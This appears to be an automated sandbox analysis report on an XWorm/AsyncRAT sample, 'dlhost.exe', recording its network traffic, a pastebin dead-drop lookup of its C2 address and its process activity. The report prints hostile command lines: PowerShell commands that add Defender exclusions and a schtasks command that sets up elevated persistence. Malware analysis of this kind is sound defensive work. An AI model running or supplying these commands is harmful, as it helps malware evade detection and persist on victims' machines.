                                                              Dec 19, 2024 08:15:54.750603914 CET80004983991.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:54.750674009 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:57.650595903 CET498398000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:57.651588917 CET498408000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:57.770355940 CET80004983991.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:57.771060944 CET80004984091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:57.771143913 CET498408000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:57.883526087 CET498408000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:58.003276110 CET80004984091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:58.615000010 CET498408000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:58.734507084 CET80004984091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:59.208539963 CET498408000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:59.328177929 CET80004984091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:59.328236103 CET498408000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:59.447782993 CET80004984091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:15:59.537798882 CET498408000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:15:59.657506943 CET80004984091.200.220.129192.168.2.5
                                                              Dec 19, 2024 08:16:05.697813034 CET498408000192.168.2.591.200.220.129
                                                              Dec 19, 2024 08:16:05.817511082 CET80004984091.200.220.129192.168.2.5

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 19, 2024 08:14:00.425848007 CET5995253192.168.2.51.1.1.1
                                                              Dec 19, 2024 08:14:00.565732956 CET53599521.1.1.1192.168.2.5
                                                              Dec 19, 2024 08:14:36.721698046 CET5382153192.168.2.51.1.1.1
                                                              Dec 19, 2024 08:14:36.863511086 CET53538211.1.1.1192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 19, 2024 08:14:00.425848007 CET192.168.2.51.1.1.10x8b10Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 08:14:36.721698046 CET192.168.2.51.1.1.10x5f9bStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 19, 2024 08:14:00.565732956 CET1.1.1.1192.168.2.50x8b10No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 08:14:36.863511086 CET1.1.1.1192.168.2.50x5f9bNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 08:14:36.863511086 CET1.1.1.1192.168.2.50x5f9bNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 08:14:36.863511086 CET1.1.1.1192.168.2.50x5f9bNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • pastebin.com
                                                              • ip-api.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549704208.95.112.1804952C:\Users\user\Desktop\dlhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 19, 2024 08:14:00.694667101 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                              Host: ip-api.com
                                                              Connection: Keep-Alive
                                                              Dec 19, 2024 08:14:01.856811047 CET175INHTTP/1.1 200 OK
                                                              Date: Thu, 19 Dec 2024 07:14:01 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 6
                                                              Access-Control-Allow-Origin: *
                                                              X-Ttl: 60
                                                              X-Rl: 44
                                                              Data Raw: 66 61 6c 73 65 0a
                                                              Data Ascii: false


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549755104.20.4.2354434952C:\Users\user\Desktop\dlhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 07:14:38 UTC74OUTGET /raw/ct3KF8KR HTTP/1.1
                                                              Host: pastebin.com
                                                              Connection: Keep-Alive
                                                              2024-12-19 07:14:38 UTC391INHTTP/1.1 200 OK
                                                              Date: Thu, 19 Dec 2024 07:14:38 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-frame-options: DENY
                                                              x-content-type-options: nosniff
                                                              x-xss-protection: 1;mode=block
                                                              cache-control: public, max-age=1801
                                                              CF-Cache-Status: EXPIRED
                                                              Last-Modified: Thu, 19 Dec 2024 07:14:38 GMT
                                                              Server: cloudflare
                                                              CF-RAY: 8f4598cdfa4e42f5-EWR
                                                              2024-12-19 07:14:38 UTC25INData Raw: 31 33 0d 0a 39 31 2e 32 30 30 2e 32 32 30 2e 31 32 39 3a 38 30 30 30 0d 0a
                                                              Data Ascii: 1391.200.220.129:8000
                                                              2024-12-19 07:14:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:02:13:55
                                                              Start date:19/12/2024
                                                              Path:C:\Users\user\Desktop\dlhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\dlhost.exe"
                                                              Imagebase:0x1a0000
                                                              File size:74'752 bytes
                                                              MD5 hash:3A9A50E33AAE389D9D1A718047BE1AAB
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2030664560.00000000001A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2030664560.00000000001A2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3283011886.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:2
                                                              Start time:02:14:01
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:02:14:01
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:02:14:08
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dlhost.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:02:14:08
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:02:14:17
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\dlhost.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:02:14:17
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:10
                                                              Start time:02:14:34
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\schtasks.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dlhost" /tr "C:\Users\user\dlhost.exe"
                                                              Imagebase:0x7ff631550000
                                                              File size:235'008 bytes
                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:02:14:34
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:02:14:43
                                                              Start date:19/12/2024
                                                              Path:C:\Users\user\dlhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\dlhost.exe"
                                                              Imagebase:0x810000
                                                              File size:74'752 bytes
                                                              MD5 hash:3A9A50E33AAE389D9D1A718047BE1AAB
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\dlhost.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\dlhost.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\dlhost.exe, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 76%, ReversingLabs
                                                              • Detection: 76%, Virustotal, Browse
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:14
                                                              Start time:02:14:52
                                                              Start date:19/12/2024
                                                              Path:C:\Users\user\dlhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\dlhost.exe"
                                                              Imagebase:0xcb0000
                                                              File size:74'752 bytes
                                                              MD5 hash:3A9A50E33AAE389D9D1A718047BE1AAB
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:15
                                                              Start time:02:15:01
                                                              Start date:19/12/2024
                                                              Path:C:\Users\user\dlhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\dlhost.exe
                                                              Imagebase:0x660000
                                                              File size:74'752 bytes
                                                              MD5 hash:3A9A50E33AAE389D9D1A718047BE1AAB
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:23.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:53
                                                                Total number of Limit Nodes:4
                                                                execution_graph 5468 7ff848f19929 5469 7ff848f19933 5468->5469 5474 7ff848f10960 5469->5474 5472 7ff848f10960 RtlSetProcessIsCritical 5473 7ff848f1998f 5472->5473 5475 7ff848f19b10 5474->5475 5478 7ff848f18fc0 5475->5478 5479 7ff848f18fc9 5478->5479 5480 7ff848f18f87 5479->5480 5481 7ff848f19822 RtlSetProcessIsCritical 5479->5481 5482 7ff848f19882 5481->5482 5482->5472 5482->5473 5511 7ff848f1920d 5512 7ff848f19218 5511->5512 5513 7ff848f18f20 RtlSetProcessIsCritical 5512->5513 5514 7ff848f19598 5513->5514 5540 7ff848f1979d 5541 7ff848f197cf RtlSetProcessIsCritical 5540->5541 5543 7ff848f19882 5541->5543 5544 7ff848f191bd 5545 7ff848f191c7 5544->5545 5546 7ff848f18f20 RtlSetProcessIsCritical 5545->5546 5548 7ff848f191f2 5545->5548 5547 7ff848f19598 5546->5547 5483 7ff848f1b431 5484 7ff848f1b44f 5483->5484 5488 7ff848f1b508 5484->5488 5489 7ff848f10990 5484->5489 5486 7ff848f1b4af 5495 7ff848f19218 5486->5495 5489->5486 5490 7ff848f1b570 5489->5490 5499 7ff848f19070 5490->5499 5496 7ff848f19221 5495->5496 5497 7ff848f18f20 RtlSetProcessIsCritical 5496->5497 5498 7ff848f19598 5497->5498 5498->5488 5500 7ff848f19079 5499->5500 5507 7ff848f18f20 5500->5507 5503 7ff848f19080 5504 7ff848f19089 5503->5504 5505 7ff848f18f20 RtlSetProcessIsCritical 5504->5505 5506 7ff848f19598 5505->5506 5506->5486 5508 7ff848f18f29 RtlSetProcessIsCritical 5507->5508 5510 7ff848f19598 5508->5510 5510->5503 5525 7ff848f1b541 5526 7ff848f1b56f 5525->5526 5527 7ff848f19070 RtlSetProcessIsCritical 5526->5527 5528 7ff848f1b5c7 5527->5528 5529 7ff848f19080 RtlSetProcessIsCritical 5528->5529 5530 7ff848f1b5d8 5529->5530 5535 7ff848f18d90 5536 7ff848f18d99 5535->5536 5537 7ff848f19822 RtlSetProcessIsCritical 5536->5537 5538 7ff848f18e9e 5536->5538 5539 7ff848f19882 5537->5539

                                                                Executed Functions

                                                                Function 00007FF848F17540 Relevance: 1.8, APIs: 1, Instructions: 300COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 87e26a27fed39be447cdfad75032e45f3c9ce8f56fdc67f55fd3d9e5ac2f7dca
                                                                • Instruction ID: 75f9a26cf58235b2506dbda2d8ad628d035d298d8e623927dc1ab1102ca42333
                                                                • Opcode Fuzzy Hash: 87e26a27fed39be447cdfad75032e45f3c9ce8f56fdc67f55fd3d9e5ac2f7dca
                                                                • Instruction Fuzzy Hash: 37A1E132C0DAC98FEB55AB6898052B97BF0FF56350F0801BAD44DC71DBDB28AD058796
                                                                Function 00007FF848F15D26 Relevance: .5, Instructions: 477COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 543 7ff848f15d26-7ff848f15d33 544 7ff848f15d3e-7ff848f15e07 543->544 545 7ff848f15d35-7ff848f15d3d 543->545 549 7ff848f15e09-7ff848f15e12 544->549 550 7ff848f15e73 544->550 545->544 549->550 551 7ff848f15e14-7ff848f15e20 549->551 552 7ff848f15e75-7ff848f15e9a 550->552 553 7ff848f15e59-7ff848f15e71 551->553 554 7ff848f15e22-7ff848f15e34 551->554 559 7ff848f15e9c-7ff848f15ea5 552->559 560 7ff848f15f06 552->560 553->552 555 7ff848f15e38-7ff848f15e4b 554->555 556 7ff848f15e36 554->556 555->555 558 7ff848f15e4d-7ff848f15e55 555->558 556->555 558->553 559->560 562 7ff848f15ea7-7ff848f15eb3 559->562 561 7ff848f15f08-7ff848f15fb0 560->561 573 7ff848f1601e 561->573 574 7ff848f15fb2-7ff848f15fbc 561->574 563 7ff848f15eec-7ff848f15f04 562->563 564 7ff848f15eb5-7ff848f15ec7 562->564 563->561 566 7ff848f15ec9 564->566 567 7ff848f15ecb-7ff848f15ede 564->567 566->567 567->567 569 7ff848f15ee0-7ff848f15ee8 567->569 569->563 575 7ff848f16020-7ff848f16049 573->575 574->573 576 7ff848f15fbe-7ff848f15fcb 574->576 583 7ff848f1604b-7ff848f16056 575->583 584 7ff848f160b3 575->584 577 7ff848f15fcd-7ff848f15fdf 576->577 578 7ff848f16004-7ff848f1601c 576->578 580 7ff848f15fe1 577->580 581 7ff848f15fe3-7ff848f15ff6 577->581 578->575 580->581 581->581 582 7ff848f15ff8-7ff848f16000 581->582 582->578 583->584 585 7ff848f16058-7ff848f16066 583->585 586 7ff848f160b5-7ff848f16146 584->586 587 7ff848f16068-7ff848f1607a 585->587 588 7ff848f1609f-7ff848f160b1 585->588 594 7ff848f1614c-7ff848f1615b 586->594 590 7ff848f1607c 587->590 591 7ff848f1607e-7ff848f16091 587->591 588->586 590->591 591->591 592 7ff848f16093-7ff848f1609b 591->592 592->588 595 7ff848f1615d 594->595 596 7ff848f16163-7ff848f161c8 call 7ff848f161e4 594->596 595->596 603 7ff848f161ca 596->603 604 7ff848f161cf-7ff848f161e3 596->604 603->604
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 504ffe2a7fe0311e866a0bd086b654c3d677103068b9f91343e566168941199c
                                                                • Instruction ID: e993eb3b79f5f8e12a0e26bc54395d04f59ba906e92ef87910ec9ce9736f5568
                                                                • Opcode Fuzzy Hash: 504ffe2a7fe0311e866a0bd086b654c3d677103068b9f91343e566168941199c
                                                                • Instruction Fuzzy Hash: 21F1943091CA4D8FEBA8EF28C8557E977D1FF58350F04426EE84DC7295CB78A9458B82
                                                                Function 00007FF848F16AD2 Relevance: .5, Instructions: 463COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6b1eb65e1ac2dd6084ce645d0758a6943fc10b6c0904f6578cc3ea959136988b
                                                                • Instruction ID: a8404596070dc20881b5573b30d9b1703c5dd285bb35763e260bc70823837fa1
                                                                • Opcode Fuzzy Hash: 6b1eb65e1ac2dd6084ce645d0758a6943fc10b6c0904f6578cc3ea959136988b
                                                                • Instruction Fuzzy Hash: 2FE1A13090CA4E8FEBA8EF28C8557E977E1EB54351F14426EE84DC7291CF78AC458B81
                                                                Function 00007FF848F11FF1 Relevance: .4, Instructions: 394COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24d084782682793bba16858a5e438bce3dc00e9421ce1b5cd6ae1a87bd2cec9f
                                                                • Instruction ID: d6a5cc1b2487cb50b4023af98242902bf2ad76f365fb049bfc7c04f465da31e3
                                                                • Opcode Fuzzy Hash: 24d084782682793bba16858a5e438bce3dc00e9421ce1b5cd6ae1a87bd2cec9f
                                                                • Instruction Fuzzy Hash: CDC19C30B1D94A9FEB98EBA8885567977D2FF98780F04457AD04EC32D2DF38AC428745
                                                                Function 00007FF848F11D5E Relevance: .2, Instructions: 204COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50202b8e45ffd673eb3fc8ad68c6ba4f139e454bae1658da4409bd72b05e4a5f
                                                                • Instruction ID: 5f0ba85ca83cc70f678a3ad0774aa3fe0018f7fa1d95b1cffab9cec857325901
                                                                • Opcode Fuzzy Hash: 50202b8e45ffd673eb3fc8ad68c6ba4f139e454bae1658da4409bd72b05e4a5f
                                                                • Instruction Fuzzy Hash: 3751B420A0E7C51FD78797B898692657FE2DF9B660B0941FFD089CB1A7CD494C4AC312
                                                                Function 00007FF848F18D90 Relevance: 1.8, APIs: 1, Instructions: 306COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b7cc9c8566364d583b98df2ea8f889e0adae09d5a46ae1933d8b39c2299ad2e6
                                                                • Instruction ID: 2e2a4f8d185d61b0fd39b332123cab7f0f6b81bd212940551cd418b819d6cbed
                                                                • Opcode Fuzzy Hash: b7cc9c8566364d583b98df2ea8f889e0adae09d5a46ae1933d8b39c2299ad2e6
                                                                • Instruction Fuzzy Hash: A7A15871C2DAC18FE359ABA859052BA7FE0FF12780F5800BFC089875D7DB18AC469356
                                                                Function 00007FF848F1979D Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 440 7ff848f1979d-7ff848f1981a 443 7ff848f19822-7ff848f19880 RtlSetProcessIsCritical 440->443 444 7ff848f19888-7ff848f198bd 443->444 445 7ff848f19882 443->445 445->444
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID: CriticalProcess
                                                                • String ID:
                                                                • API String ID: 2695349919-0
                                                                • Opcode ID: e63050387b3db86f578294c3112a4d9a952531601c0add9e97170148d9bdf011
                                                                • Instruction ID: 9c51cf54ed773884474adae7dc41e68657d7970bd279053a85159b18fe3be3f8
                                                                • Opcode Fuzzy Hash: e63050387b3db86f578294c3112a4d9a952531601c0add9e97170148d9bdf011
                                                                • Instruction Fuzzy Hash: 6841C33190D6488FD719DF98D845AE9BBF0FF56311F04416ED08AC3592CB78A846CB91
                                                                Function 00007FF848F18F15 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID: CriticalProcess
                                                                • String ID:
                                                                • API String ID: 2695349919-0
                                                                • Opcode ID: 3cf5896705b9896f30655b743c0b0bb373025d28f8f35bc1e79d1e52ceb0cbdc
                                                                • Instruction ID: 79877c5ef5c32bb6f2818a5201f304d780e0b354592d86f2657592344493e38f
                                                                • Opcode Fuzzy Hash: 3cf5896705b9896f30655b743c0b0bb373025d28f8f35bc1e79d1e52ceb0cbdc
                                                                • Instruction Fuzzy Hash: 8641063190CA888FD719EF5C98457F97BE0FF66351F14016FD08AD3582DB646846CB91
                                                                Function 00007FF848F18F20 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 471 7ff848f18f20-7ff848f19880 RtlSetProcessIsCritical 477 7ff848f19888-7ff848f198bd 471->477 478 7ff848f19882 471->478 478->477
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID: CriticalProcess
                                                                • String ID:
                                                                • API String ID: 2695349919-0
                                                                • Opcode ID: f5ccd8123c61e620b2ee0d8e2cdfee9a54b3daf33e336c8a348d7c6ad24321a2
                                                                • Instruction ID: 2e57bd1f0d3939448c77ecaf3742e6b05a041239c19c2872c847502387a46e34
                                                                • Opcode Fuzzy Hash: f5ccd8123c61e620b2ee0d8e2cdfee9a54b3daf33e336c8a348d7c6ad24321a2
                                                                • Instruction Fuzzy Hash: FA41E13190CA488FDB19EB9898496E9BBF0FF56351F14012ED08AD3682DB746846CB91

                                                                Non-executed Functions

                                                                Function 00007FF848F124CE Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318998943.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_dlhost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ;s]I
                                                                • API String ID: 0-1355590808
                                                                • Opcode ID: cbb59faca172547b14c7cc2e37ad4b36e879a6f4d8d65218fc0f394dadd86975
                                                                • Instruction ID: 827124902015767fe30749802ed51c30d6bf1a446b7a15e428c4388b871d3ece
                                                                • Opcode Fuzzy Hash: cbb59faca172547b14c7cc2e37ad4b36e879a6f4d8d65218fc0f394dadd86975
                                                                • Instruction Fuzzy Hash: 8781D262C0E6C25FE35B97B818291A57FE1EF537A0B0941FBC4948B0D7DA1D9C0E8356

                                                                Executed Functions

                                                                Function 00007FF848FE660A Relevance: 6.7, Strings: 5, Instructions: 427COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2152304683.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B#I$(B#I$(B#I$(B#I$(B#I
                                                                • API String ID: 0-1620291718
                                                                • Opcode ID: a406140aec263be3d9ef8b25bc000e4e0188e2ce3c8b0266ddae7c022149f590
                                                                • Instruction ID: 15d3258532ec3df225d3315edf2dbb70bf13cffdad316e1197729e4b596d6bfa
                                                                • Opcode Fuzzy Hash: a406140aec263be3d9ef8b25bc000e4e0188e2ce3c8b0266ddae7c022149f590
                                                                • Instruction Fuzzy Hash: BFC15131D1EA8E5FEB99AB2858545B9BBA1EF16390F1800FED44DCB0D3EB1CA801C355
                                                                Function 00007FF848FE664B Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
